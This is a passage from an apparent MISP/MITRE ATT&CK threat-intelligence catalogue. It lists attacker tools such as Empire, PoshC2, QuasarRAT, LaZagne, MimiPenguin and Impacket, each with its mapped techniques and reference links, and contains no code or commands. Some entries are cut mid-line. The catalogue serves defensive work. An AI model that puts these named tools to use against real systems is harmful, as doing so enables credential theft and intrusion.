• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
meek - S0175

[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.

The tag is: *misp-galaxy:mitre-tool="meek - S0175"

meek - S0175 is also known as:

- meek

meek - S0175 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004" with estimative-language:likelihood-probability="almost-certain"

IronNetInjector - S0581

[IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021)

The tag is: *misp-galaxy:mitre-tool="IronNetInjector - S0581"

IronNetInjector - S0581 is also known as:

- IronNetInjector

IronNetInjector - S0581 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-
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<tr>
<td><a href="https://attack.mitre.org/software/S0581">https://attack.mitre.org/software/S0581</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/ironnetinjector/">https://unit42.paloaltonetworks.com/ironnetinjector/</a></td>
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**ConnectWise - S0591**

[ConnectWise](https://attack.mitre.org/software/S0591) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://attack.mitre.org/groups/G0069) and [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) to connect to and conduct lateral movement in target environments. (Citation: Anomali Static Kitten February 2021) (Citation: Trend Micro Muddy Water March 2021)

The tag is: `misp-galaxy:mitre-tool="ConnectWise - S0591"`

ConnectWise - S0591 is also known as:

- ConnectWise
- ScreenConnect

ConnectWise - S0591 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Video Capture - T1125"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"` with estimative-
### SDelete - S0195

[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)

The tag is: *misp-galaxy:mitre-tool="SDelete - S0195"

SDelete - S0195 is also known as:

- SDelete

SDelete - S0195 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

### MimiPenguin - S0179

[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)

The tag is: *misp-galaxy:mitre-tool="MimiPenguin - S0179"

MimiPenguin - S0179 is also known as:

- MimiPenguin
MimiPenguin - S0179 has relationships with:


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<tr>
<th>Table 4954. Table References</th>
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<tr>
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<td><a href="https://attack.mitre.org/software/S0179">https://attack.mitre.org/software/S0179</a></td>
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<tr>
<td><a href="https://github.com/huntergregal/mimipenguin">https://github.com/huntergregal/mimipenguin</a></td>
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</table>

Havij - S0224

[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)

The tag is: *misp-galaxy:mitre-tool="Havij - S0224"

Havij - S0224 is also known as:

- Havij

Havij - S0224 has relationships with:


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<tr>
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<td><a href="https://attack.mitre.org/software/S0224">https://attack.mitre.org/software/S0224</a></td>
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<td><a href="https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/">https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/</a></td>
</tr>
</tbody>
</table>

sqlmap - S0225

[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)

The tag is: *misp-galaxy:mitre-tool="sqlmap - S0225"

sqlmap - S0225 is also known as:

- sqlmap

sqlmap - S0225 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with
QuasarRAT - S0262

[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that is publicly available on GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language. (Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018)

The tag is: *misp-galaxy:mitre-tool="QuasarRAT - S0262"

QuasarRAT - S0262 is also known as:

- QuasarRAT
- xRAT

QuasarRAT - S0262 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-

• uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0262">https://attack.mitre.org/software/S0262</a></td>
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<td><a href="https://github.com/quasar/QuasarRAT">https://github.com/quasar/QuasarRAT</a></td>
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<td><a href="https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/">https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/</a></td>
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</tbody>
</table>

**spwebmember - S0227**

[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)

The tag is: *misp-galaxy:mitre-tool="spwebmember - S0227"*

spwebmember - S0227 is also known as:

• spwebmember

spwebmember - S0227 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0227">https://attack.mitre.org/software/S0227</a></td>
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**Remcos - S0332**

[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)
The tag is: `misp-galaxy:mitre-tool="Remcos - S0332"`

Remcos - S0332 is also known as:

- Remcos

Remcos - S0332 has relationships with:

- **uses**: `misp-galaxy:mitre-attack-pattern="System Checks - T1497.001"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Audio Capture - T1123"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Video Capture - T1125"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Proxy - T1090"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Process Injection - T1055"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Screen Capture - T1113"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Python - T1059.006"` with estimative-language:likelihood-probability="almost-certain"

*Table 4959. Table References*
PoshC2 - S0378

[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)

The tag is: `misp-galaxy:mitre-tool="PoshC2 - S0378"`

PoshC2 - S0378 is also known as:

- PoshC2

PoshC2 - S0378 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0378">https://attack.mitre.org/software/S0378</a></td>
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<tr>
<td><a href="https://github.com/nettitude/PoshC2_Python">https://github.com/nettitude/PoshC2_Python</a></td>
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**AdFind - S0552**

[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory. (Citation: Red Canary Hospital Thwarted Ryuk October 2020) (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye Ryuk and Trickbot January 2019)

The tag is: *misp-galaxy:mitre-tool="AdFind - S0552"*

AdFind - S0552 is also known as:

- AdFind

AdFind - S0552 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"


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<td><a href="https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/">https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/</a></td>
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</table>
RemoteUtilities - S0592

[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines. (Citation: Trend Micro Muddy Water March 2021)

The tag is: `misp-galaxy:mitre-tool="RemoteUtilities - S0592"`

RemoteUtilities - S0592 is also known as:

- RemoteUtilities

RemoteUtilities - S0592 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0592">https://attack.mitre.org/software/S0592</a></td>
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Xbot - S0298

[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)

The tag is: `misp-galaxy:mitre-tool="Xbot - S0298"`

Xbot - S0298 is also known as:

- Xbot

Xbot - S0298 has relationships with:

- similar: `misp-galaxy:banker="TinyNuke"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Xbot"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="TinyNuke"` with estimative-language:likelihood-
Empire - S0363

[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)

The tag is: `misp-galaxy:mitre-tool="Empire - S0363"

Empire - S0363 is also known as:

- Empire
- EmPyre
- PowerShell Empire

Empire - S0363 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1574.004" with estimative-language:likelihood-probability="almost-certain"

Table 4964. Table References

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<td><a href="https://github.com/EmpireProject/Empire">https://github.com/EmpireProject/Empire</a></td>
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<tr>
<td><a href="https://github.com/dstepanic/attck_empire">https://github.com/dstepanic/attck_empire</a></td>
</tr>
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**RawDisk - S0364**

[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)

The tag is: *misp-galaxy:mitre-tool="RawDisk - S0364"

RawDisk - S0364 is also known as:

- RawDisk

RawDisk - S0364 has relationships with:


- uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"

Table 4965. Table References

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<td><a href="https://attack.mitre.org/software/S0364">https://attack.mitre.org/software/S0364</a></td>
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</table>
LaZagne - S0349

[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)

The tag is: `misp-galaxy:mitre-tool="LaZagne - S0349"

LaZagne - S0349 is also known as:

- LaZagne

LaZagne - S0349 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="/etc/passwd and /etc/shadow - T1003.008" with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 4966. Table References

Links

https://attack.mitre.org/software/S0349

2888
Impacket - S0357

[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)

The tag is: `misp-galaxy:mitre-tool="Impacket - S0357"`

Impacket - S0357 is also known as:

- Impacket

Impacket - S0357 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="NTDS - T1003.003"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004"` with `estimative-language:likelihood-probability="almost-certain"`

Table 4967. Table References

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<td><a href="https://attack.mitre.org/software/S0357">https://attack.mitre.org/software/S0357</a></td>
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Ruler - S0358

[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)

The tag is: `misp-galaxy:mitre-tool="Ruler - S0358"`

Ruler - S0358 is also known as:

- Ruler

Ruler - S0358 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Email Account - T1087.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Outlook Rules - T1137.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003"` with estimative-language:likelihood-probability="almost-certain"

Table 4968. Table References

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<td><a href="https://attack.mitre.org/software/S0358">https://attack.mitre.org/software/S0358</a></td>
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<td><a href="https://github.com/sensepost/ruler">https://github.com/sensepost/ruler</a></td>
</tr>
<tr>
